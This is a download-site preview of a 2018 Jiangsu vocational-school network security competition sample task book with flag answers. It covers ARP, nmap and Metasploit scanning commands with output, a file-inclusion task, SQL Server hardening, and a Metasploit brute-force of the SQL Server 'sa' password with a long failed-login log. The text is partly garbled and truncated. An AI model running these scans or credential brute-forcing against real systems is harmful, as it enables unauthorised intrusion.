ImageVerifierCode 换一换
格式:DOCX , 页数:13 ,大小:86.96KB ,
资源ID:3982579      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/3982579.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(江苏省度中职组网络空间安全赛项样题及答案.docx)为本站会员(b****5)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

江苏省度中职组网络空间安全赛项样题及答案.docx

1、江苏省度中职组网络空间安全赛项样题及答案2018年度全国职业技术大赛中职组“网络空间安全”赛项江苏省竞赛任务书(样题)一、竞赛时刻9:00-12:00,共计3小时。二、竞赛时期简介竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段单兵模式系统渗透测试任务1ARP协议渗透测试9:00-11:0015任务2操作系统及应用程序扫描渗透测试15任务3Web应用程序文件包含安全攻防20任务4数据库安全加固20第二阶段分组对抗系统加固11:00-11:1530渗透测试11:15-12:00三、竞赛任务书内容(一)拓扑图(二)第一时期任务书任务扫描渗透测试任务环境说明:服务器场景:服务器场景操作系统:1.通过PC

2、2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具arping,发送请求数据包数量为5个),并将该操作利用命令中固定不变的字符串作为Flag提交;2.Arping c 5 通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左侧数第2个数字作为Flag提交;Arping c 5 arping -c 5 from eth0Unicast reply from 00:0C:29:62:80:73 Unicast reply from 00:0C:29:62:80:73 Unicast reply fro

3、m 00:0C:29:62:80:73 Unicast reply from 00:0C:29:62:80:73 Unicast reply from 00:0C:29:62:80:73 Sent 5 probes (1 broadcast(s)Received 5 response(s)Flag:53.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块寄存路径字符串作为Flag(形式:字符串1/字符串2/字符串3/字符串n)提交; msf use auxiliary/scan

4、ner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep 4.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;msf use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) run* appears to be up (VMware, Inc.).*

5、appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag:completed5.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行显现的IP地址右边的第1个单词作为Flag提交;msf auxiliary(arp_sweep) run* appears to be up

6、 (VMware, Inc.).* appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag:appears6.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明:服务

7、器场景:服务器场景操作系统:1.通过PC2中渗透测试平台对服务器场景进行ping扫描渗透测试(利用工具nmap,利用参数n,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;2.Flag:Nmap n Sp 通过PC2中渗透测试平台对服务器场景进行ping扫描渗透测试(利用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;rootkali:# nmap -n -sP Nmap ( ) at 2017-12-10 19:59 ESTNmap scan report for is up latency).Nmap done: 1 IP add

8、ress (1 host up) scanned in secondsFlag:up3.通过PC2中渗透测试平台对服务器场景进行综合性扫描渗透测试(利用工具nmap,利用参数n,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;rootkali:# nmap -n -A Nmap ( ) at 2017-12-10 20:11 ESTNmap scan report for is up latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH (prot

9、ocol | ssh-hostkey: | 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp statu

10、s|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux CPE: cpe:/o:linux:linux_kernel:OS details: Linux - Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 ms and Service detection performed. Please report any incorrect results at submit/ .Nmap done: 1 I

11、P address (1 host up) scanned in seconds4.Flag:Nmap n A 通过PC2中渗透测试平台对服务器场景进行综合性扫描渗透测试(利用工具nmap,利用参数n,利用必需要利用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;rootkali:# nmap -n -A Nmap ( ) at 2017-12-10 20:11 ESTNmap scan report for is up latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh

12、 OpenSSH (protocol | ssh-hostkey: | 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1

13、 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux CPE: cpe:/o:linux:linux_kernel:OS details: Linux - Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 ms and Service detection performed. Please report any incorrect results at submit/ .

14、Nmap done: 1 IP address (1 host up) scanned in secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景进行操作系统扫描渗透测试(利用工具nmap,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;rootkali:# nmap -O Nmap ( ) at 2017-12-10 20:13 ESTNmap scan report for is up latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tc

15、p open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux CPE: cpe:/o:linux:linux_kernel:OS details: Linux - Distance: 1 hopOS detection performed. Please report any incorrect results at submit/ .Nmap done: 1 IP address (1 host up) scanned in seconds6.Flag:Nmap

16、O 通过通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(利用工具nmap,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;7.Flag:Nmap sV 通过通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(利用工具nmap,利用必需要利用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;rootkali:# nmap -sV Nmap ( ) at 2017-12-10 20:17 ESTNmap scan report for is up latency).Not shown: 998 closed

17、 portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH (protocol 111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at submit/ .Nmap done: 1 IP address (1 host up) scanned in secondsFlag:OpenSSH 任务应用程序文件包括安全攻防任

18、务环境说明:服务器场景名称:WebServ2003服务器场景安全操作系统:Microsoft Windows2003 Server服务器场景安装中间件:;服务器场景安装Web开发环境:Php6;服务器场景安装数据库:Microsoft SqlServer2000;服务器场景安装文本编辑器:EditPlus;1.访问WebServ2003服务器场景,/-Display Uploadeds File Content,分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2.对该任务题目1页面注入点进行渗透测试,通过,并将注入语句作为Flag提交;3.对该任

19、务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;5.进入WebServ2003服务器场景的目录,找到文件,利用EditPlus工具打开并填写该文件中空缺的F一、F二、F3、F4的值,使之能够抵御文件包括渗透测试,并提交Flag(形式:F1|F2|F3|F4);6.再次对该任务题目1页面注入点进行渗透测试,验证这次利用该注入点对WebServ2003服务器场景进行文件包括渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固任务环境说明:服务

20、器场景名称:WebServ2003服务器场景安全操作系统:Microsoft Windows2003 Server服务器场景安装中间件:;服务器场景安装Web开发环境:Php6;服务器场景安装数据库:Microsoft SqlServer2000;服务器场景安装文本编辑器:EditPlus;1.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;2.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,在安装补丁后

21、的服务器场景中运行netstatan命令,将回显的数据库服务连接状态作为Flag提交;C:Documents and SettingsAdministratornetstat -anActive Connections Proto Local Address Foreign Address State TCP LISTENING TCP LISTENING TCP LISTENING TCP LISTENING TCP LISTENING UDP *:* UDP *:* UDP *:* UDP *:* UDP *:* UDP *:* UDP *:* UDP *:*Flag:LISTENING3

22、.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;msf use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) run* - SQL Server information for - ServerName = SERVER+ - InstanceName = MSSQLSERVER+ - IsClustered = No+ - Version = - tcp = 1433+ - np = SERVERpipesqlquery* Scanned 1 of

23、 1 hosts (100% complete)* Auxiliary module execution completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级治理员口令暴力破解(利用PC2中的渗透测试平台中的字典文件),并将破解结果中的最后一个字符串作为Flag提交;msf use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) set username samsf auxiliary(mssql_login) set pass_file /usr/share/wordl

24、ists/metasploit/ msf auxiliary(mssql_login) run* - - MSSQL - Starting authentication scanner.! - No active DB - Credential data will not be saved!- - - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!#$%& (Incorrect

25、: )- - - LOGIN FAILED: WORKSTATIONsa:!#$%&* (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!boerbul (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!boerseun (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!gatvol (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!hotnot (Incorrect: )- - - LOGIN FAILED:

26、WORKSTATIONsa:!kak (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!koedoe (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!likable (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!poes (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!pomp (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:!soutpiel (Incorr

27、ect: )- - - LOGIN FAILED: WORKSTATIONsa: (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:0 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:000000 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:00000000 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:0007 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:0

28、07 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:007007 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:0s (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:0th (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:10 (Incorrect: )- - - LOGIN FAILED: WORKSTATIO

29、Nsa:100 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1000 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1000s (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:100s (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1022 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:10s (Incorrect: )- - - LOGIN FAILED:

30、 WORKSTATIONsa:10sne1 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1111 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:11111 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:111111 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa: (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:112233 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1212 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:121212 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1213 (Incorrect: )- - - LOGIN FAILED: WORKSTATIONsa:1214 (Incorrect: )- - - LOGIN FAILE

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1